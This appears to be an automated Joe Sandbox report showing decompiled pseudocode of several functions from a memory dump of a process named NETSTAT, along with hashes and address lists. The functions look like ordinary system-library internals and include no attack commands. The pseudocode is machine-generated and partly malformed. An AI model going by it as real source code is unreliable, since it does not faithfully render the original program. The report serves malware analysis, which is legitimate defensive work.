Instruction ID: 569ccba2c1eda221b5665367d30277805b784ab552efa33288b18d77f3cb9601
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: E911E572544208BFCB05AF5CD8809BEBBB9EF95304F1090AAF988CB350DA329D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 02E6C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E02E6C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x2f5d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E02E7EEF0(0x2f570a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E02EEF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E02E7EB70(_t29, 0x2f570a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E02EAB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E02EEF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x2f570c0; // 0x0
					while(_t38 != 0x2f570c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x2f5b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x02e6c96a
0x02e6c974
0x02e6c988
0x02e6c98a
0x02ed7c9d
0x02ed7c9f
0x02ed7ca4
0x02ed7cae
0x02ed7cf0
0x02ed7cf5
0x02ed7cfa
0x02e6c992
0x02e6c996
0x02e6c997
0x02e6c998
0x02e6c9a3
0x02e6c9a3
0x02ed7cb0
0x02ed7cb7
0x02ed7cbb
0x00000000
0x00000000
0x02ed7cbd
0x02ed7ce8
0x02ed7cc5
0x02ed7cc8
0x02ed7cca
0x02ed7cd0
0x02ed7cd6
0x02ed7cde
0x02ed7ce4
0x02ed7ce4
0x02ed7cd0
0x00000000
0x02ed7ce8
0x02e6c990
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63a3b0c67eea3dd27e8af736a3b42adb7458ab922f574c9fc9f1dee5cd00487
Instruction ID: f80f48f14dcfec7705700dea3876a13c753f99b1a239620ff442c8d4e30cc150
Opcode Fuzzy Hash: c63a3b0c67eea3dd27e8af736a3b42adb7458ab922f574c9fc9f1dee5cd00487
Instruction Fuzzy Hash: 43110C327807169FE710AF28CC45A6BF7E6FF88658B046929FE4687650DB20EC11CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 02EA37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E02EA37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E02E82280(_t6, 0x2f58550);
				}
				_t29 = E02EA387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E02E7FFB0(0x2f58550, _t27, 0x2f58550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x02ea37fa
0x02ea37fc
0x02ea3805
0x02ea3808
0x02ea3808
0x02ea3814
0x02ea3818
0x02ea3846
0x02ea3848
0x02ea384b
0x02ea384b
0x02ea3852
0x00000000
0x02ea3854
0x02ea3856
0x00000000
0x00000000
0x02ea3863
0x00000000
0x02ea3863
0x02ea381a
0x02ea381a
0x02ea381f
0x02ea386e
0x02ea386e
0x02ea3871
0x02ea3873
0x02ea3873
0x02ea3868
0x00000000
0x02ea3868
0x02ea3821
0x02ea3826
0x00000000
0x00000000
0x02ea3828
0x02ea382a
0x02ea3841
0x00000000
0x02ea3841

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8823c9dca817f893082a8509ce1bbbbcd72b9620287796f999a42af805314291
Instruction ID: 9f4606c7ed002b5ee6c21cbc40c5a55ac041fc560f3baa508c2010914a4bac33
Opcode Fuzzy Hash: 8823c9dca817f893082a8509ce1bbbbcd72b9620287796f999a42af805314291
Instruction Fuzzy Hash: 1501DB729816105BC3379B199550E26BBA6DF85B64715D0E9F9498F354D730E801C780

Uniqueness

Uniqueness Score: -1.00%

Function 02E9002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E9002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E02E87D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E02E87D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E02E87D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E02E87D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x02e90032
0x02e90037
0x02e90043
0x02ed4b3a
0x02e90049
0x02e90049
0x02e90049
0x02e9004e
0x02e90053
0x02ed4b48
0x02ed4b5a
0x02ed4b4a
0x02ed4b53
0x02ed4b53
0x02ed4b5f
0x00000000
0x02ed4b61
0x00000000
0x02ed4b61
0x02e90059
0x02e90059
0x02e90060
0x02ed4b6f
0x02ed4b6f
0x02e90069
0x02ed4b83
0x00000000
0x00000000
0x02ed4b90
0x02ed4b9b
0x02ed4b9b
0x02ed4ba4
0x00000000
0x00000000
0x02ed4baa
0x00000000
0x02e9006f
0x02e9006f
0x00000000
0x02e9006f
0x02e90069

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: f0b6cb2df033d763c060bd4715416e54397a1d3369f692614196eb8ca1f25a4e
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 71112B39281680CFDB229764C968B7577D5EF6275CF19B0A1ED18876D2E338C842C650

Uniqueness

Uniqueness Score: -1.00%

Function 02E7766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02E7766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E02E9F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E02E9F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L02E84620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x02e77672
0x02e7767f
0x02e77689
0x02e776de
0x02e776de
0x02e7768b
0x02e77691
0x02e77693
0x02e77697
0x00000000
0x02e77699
0x02e776a8
0x00000000
0x02e776aa
0x02e776ad
0x02e776b1
0x00000000
0x02e776b3
0x02e776b3
0x02e776b5
0x02e776ba
0x02e776bc
0x02e776bc
0x02e776c0
0x00000000
0x02e776c2
0x02e776ce
0x02e776ce
0x02e776c0
0x02e776b1
0x02e776a8
0x02e77697
0x02e776d9

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: bd62df1a8bd2122a29c5414645360b82491280fdbd273d0e35ed42a0c853f3b3
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 0D01A732740219AFCB24DE9ECC41E5BB7ADEB84764F249564BD08CB258DA30DD01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02E69080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02E69080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x2f585ec;
				E02E82280(_t48, 0x2f585ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E02E7FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x2f5538c; // 0x776f6888
					if( *_t84 != 0x2f55388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x2f3f6e8);
						E02EBD0E8(0x2f585ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E02F388F5(_t80, _t85, 0x2f55388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x2f586c0; // 0x3f07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x2f586b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E02E82280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E02F388F5(0x2f585ec, _t85, 0x2f55388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E02EAAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x2f5b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x2f584c0;
																			if(_t82 >=  *0x2f584c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E02F39063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E02E6922A(_t99);
										_t64 = E02E87D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E02F38B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x2f586c0; // 0x3f07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x2f586b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x2f586bc;
													_t87 = 0x2f586b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E02E69240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x2f586c4;
												_t87 = 0x2f586c0;
												L27:
												E02E99B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E02EBD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x2f55388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x2f5538c = _t51;
						goto L6;
					}
				}
			}

0x02e69082
0x02e69083
0x02e69084
0x02e69085
0x02e69087
0x02e69096
0x02e69098
0x02e69098
0x02e6909e
0x02e690a8
0x02e690e7
0x02e690e7
0x02e690aa
0x02e690b0
0x02e690b7
0x02e690bd
0x02e690dd
0x02e690e6
0x02e690bf
0x02e690bf
0x02e690c7
0x02e690cf
0x02e690f1
0x02e690f2
0x02e690f4
0x02e690f5
0x02e690f6
0x02e690f7
0x02e690f8
0x02e690f9
0x02e690fa
0x02e690fb
0x02e690fc
0x02e690fd
0x02e690fe
0x02e690ff
0x02e69100
0x02e69102
0x02e69107
0x02e6910c
0x02e69110
0x02e69113
0x02e69115
0x02e69136
0x02e6913f
0x02e69143
0x02ec37e4
0x02ec37e4
0x02e69117
0x02e69117
0x02e6911d
0x00000000
0x02e6911f
0x02e6911f
0x02e69125
0x00000000
0x02e69127
0x02e6912d
0x02e69130
0x02e69134
0x02e69158
0x02e6915d
0x02e69161
0x02e69168
0x02ec3715
0x02e6916e
0x02e6916e
0x02e69175
0x02e69177
0x02e6917e
0x02e6917f
0x02e69182
0x02e69182
0x02e69187
0x02e69187
0x02e6918a
0x02e6918d
0x02e6918f
0x02e69192
0x02e69195
0x02e69198
0x02e69198
0x02e69198
0x02e6919a
0x00000000
0x00000000
0x02ec371f
0x02ec3721
0x02ec3727
0x02ec372f
0x02ec3733
0x02ec3735
0x02ec3738
0x02ec373b
0x02ec373d
0x02ec3740
0x00000000
0x02ec3746
0x02ec3746
0x02ec3749
0x00000000
0x02ec374f
0x02ec374f
0x02ec3751
0x02ec3757
0x02ec3759
0x02ec375c
0x02ec375c
0x02ec375e
0x02ec375e
0x02ec3761
0x02ec3764
0x00000000
0x00000000
0x02ec3766
0x02ec3768
0x02ec37a3
0x02ec37a3
0x02ec37a5
0x02ec37a7
0x02ec37ad
0x02ec37b0
0x02ec37b2
0x02ec37bc
0x02ec37c2
0x02ec37c2
0x02ec37b2
0x02e69187
0x02e69187
0x02e6918a
0x02e6918d
0x02e6918f
0x02e69192
0x02e69195
0x00000000
0x02e69195
0x00000000
0x02ec376a
0x02ec376a
0x02ec376a
0x02ec376c
0x02ec376c
0x02ec376f
0x02ec3775
0x00000000
0x00000000
0x02ec3777
0x02ec3779
0x02ec3782
0x02ec3787
0x02ec3789
0x02ec3790
0x02ec3790
0x02ec378b
0x02ec378b
0x02ec378b
0x02ec3792
0x02ec3795
0x00000000
0x02ec3795
0x00000000
0x02ec3779
0x02ec3798
0x00000000
0x02ec3798
0x00000000
0x02ec3768
0x02ec379b
0x02ec379b
0x02ec3751
0x02ec3749
0x00000000
0x02ec3740
0x02e691a0
0x02e691a3
0x02e691a9
0x02e691b0
0x00000000
0x02e691b0
0x02e69187
0x02e691b4
0x02e691b4
0x02e691bb
0x02e691c0
0x02e691c5
0x02e691c7
0x02ec37da
0x02e691cd
0x02e691cd
0x02e691cd
0x02e691d2
0x02e691d5
0x02e69239
0x02e69239
0x02e691d7
0x02e691db
0x02e691e1
0x02e691e7
0x02e691fd
0x02e69203
0x02e6921e
0x02e69223
0x00000000
0x02e69205
0x02e69205
0x02e69208
0x02e6920c
0x02e69214
0x02e69214
0x02e6920c
0x02e691e9
0x02e691e9
0x02e691ee
0x02e691f3
0x02e691f3
0x02e691f3
0x02e691e7
0x00000000
0x00000000
0x00000000
0x02e69134
0x02e69125
0x02e6911d
0x02e6914e
0x02e690d1
0x02e690d1
0x02e690d3
0x02e690d6
0x02e690d8
0x00000000
0x02e690d8
0x02e690cf

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992cd0572596fb4e90f22788436025356ba0367e0da7716a486c221ea1f57501
Instruction ID: 69399fa57e4d924ddde6690c6e7c0de8f9361e46c5830f1e870e6668bfdf8ad1
Opcode Fuzzy Hash: 992cd0572596fb4e90f22788436025356ba0367e0da7716a486c221ea1f57501
Instruction Fuzzy Hash: 570128729812148FC3149F14D844B22B7FAEF413A4F22A066E6098F792C371DC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02EFC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E02EFC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E02EA9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E02EA95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E02EA95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E02EA95D0();
				return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x02efc458
0x02efc45d
0x02efc466
0x02efc468
0x02efc469
0x02efc46a
0x02efc46b
0x02efc46e
0x02efc46f
0x02efc471
0x02efc476
0x02efc476
0x02efc47c
0x02efc47e
0x02efc480
0x02efc480
0x02efc483
0x02efc484
0x02efc486
0x02efc488
0x02efc48f
0x02efc491
0x02efc493
0x02efc493
0x02efc48f
0x02efc498
0x02efc49e
0x02efc4ad
0x02efc4ad
0x02efc4b2
0x02efc4b4
0x02efc4cd

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: bbc2306dc99eef9a0ce212b025812f2e9b58d4291a9ca371929e2b055edfbc1e
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: AF019E761C0509BFD721AF65CC90E62F76EFF54399F20D526F25887560DB22ACA0CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F34015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E02F34015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E02E82280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E02E82280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2f586ac);
					E02E6F900(0x2f586d4, _t28);
					E02E7FFB0(0x2f586ac, _t28, 0x2f586ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E02E7FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x02f3401a
0x02f3401e
0x02f34023
0x02f34028
0x02f34029
0x02f3402b
0x02f3402f
0x02f34043
0x02f34046
0x02f34051
0x02f34057
0x02f3405f
0x02f34062
0x02f34067
0x02f3406f
0x02f3407c
0x02f3407c
0x02f3408c
0x02f3408c
0x02f34097

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d287b18e2a2b9b5f48647832dcd245a215d57ed88bccf758083de2d7593e366d
Instruction ID: 717fa0a518158fa1b8f25e331ff12e2f775a9a3a2319c34b70db766b3858ed28
Opcode Fuzzy Hash: d287b18e2a2b9b5f48647832dcd245a215d57ed88bccf758083de2d7593e366d
Instruction Fuzzy Hash: 3F018F72681945BFD311BB79CD80E13B7ADEB457A0B001229FA0C87A11CB34EC51CEE4

Uniqueness

Uniqueness Score: -1.00%

Function 02F2138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E02F2138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2f5d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02EAFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E02E87D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x02f2138a
0x02f2138a
0x02f21399
0x02f213a3
0x02f213a8
0x02f213aa
0x02f213b5
0x02f213bb
0x02f213c3
0x02f213c6
0x02f213c9
0x02f213d4
0x02f213e6
0x02f213d6
0x02f213df
0x02f213df
0x02f213f1
0x02f213f2
0x02f213f4
0x02f213f9
0x02f2140e

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

